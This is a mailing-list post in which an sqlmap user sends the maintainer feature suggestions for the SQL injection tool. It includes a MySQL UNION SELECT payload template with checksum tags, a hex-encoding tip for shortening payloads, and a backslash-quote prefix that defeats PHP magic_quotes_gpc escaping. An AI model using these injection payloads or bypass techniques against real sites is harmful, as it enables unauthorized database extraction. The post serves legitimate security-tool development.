Hello, Miroslav! On Ср., 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote: > Hi Vladimir. > > Thank you for your report. We'll so something about it. In the mean > time you can experiment with --technique (other than U) or > --start/--stop. > > If there is no alternative please contact me privately and i'll make > you a temporary patch. > > That idea with end char is great. We'll try to use it in detection > phase. > > Kr > > On 9.8.2011. 22:34, "Vladimir Rutsky" <rutsky.vladi...@gmail.com> > wrote: >
Thank you for fast reply! I managed to get required information without using of sqlmap, so temporary patch is not needed, let my letter will be feature request for future versions of sqlmap. I my case using --start/--stop helped a little --- when I provide such options looks like sqlmap obtains requested rows one by one, so limit in PHP script for 10 items per page is never reached. But anyway sqlmap incorrectly obtains not more than 10 columns from table, so I can't get full table dump with it. Below I consider that we using UNION-SELECT-technique. 1. How about along with each obtained item from database through sql-injection also pass checksum for that value. UNION-SELECT-technique SQL-injection by it's nature gives ability to obtain values from database as text --- because HTTP transfers text, so you can apply any checksum to that text. I suggest to request value through sql-injection as follows (for MySQL): UNION SELECT CONCAT( "start tag", CAST(xxx AS CHAR), MD5(CAST(xxx AS CHAR)), "end tag") Then if obtained result contains text with valid checksum between start and end tags, then output is definitely not corrupted or truncated. 2. I saw that in MySQL queries you use a lot of "CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their length by using hexadecimal presentations of strings in MySQL, like "CONCAT(0x3a2e79763a, ...". 3. I looked through xml/payloads.xml and didn't find prefixes for simple WHERE clause inclusions on PHP-powered host with enabled magic_quotes_gpc [1]. Consider example (PHP and MySQL): mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'"); When single quote is passed through GET it's being escaped: "'" -> "\'". To workaround such escaping is enough to use "\'" prefix in sqlmap: "\'" -> "\\'". I suggest to use "\'" prefixes in sqlmap along with "'" prefixes. [1] http://php.net/manual/en/security.magicquotes.php 4. I tried to get familiar with source code of sqlmap, but despite it is written in Python it is quite hard to read and understand without learning main idea and methods that are used in sqlmap. Is there any developer documentation? Doing SQL-injection is an art in some sense. So sqlmap will never be able to automatically hack every vulnerable site (but will help in most of them). I think sqlmap should provide extendable and easy to use library, divided on several independent modules, like module for testing url for vulnerabilities, module for fetching data from foreign database when "vector" for obtaining single item from database is found, and so on. P.S. I'm new to sqlmap and probably some of my thoughts described below don't make sense in context of this project, or some of my ideas are already implemented. Hope this letter will be useful. Best wishes, Vladimir Rutsky ------------------------------------------------------------------------------ Get a FREE DOWNLOAD! and learn more about uberSVN rich system, user administration capabilities and model configuration. Take the hassle out of deploying and managing Subversion and the tools developers use with it. http://p.sf.net/sfu/wandisco-dev2dev _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users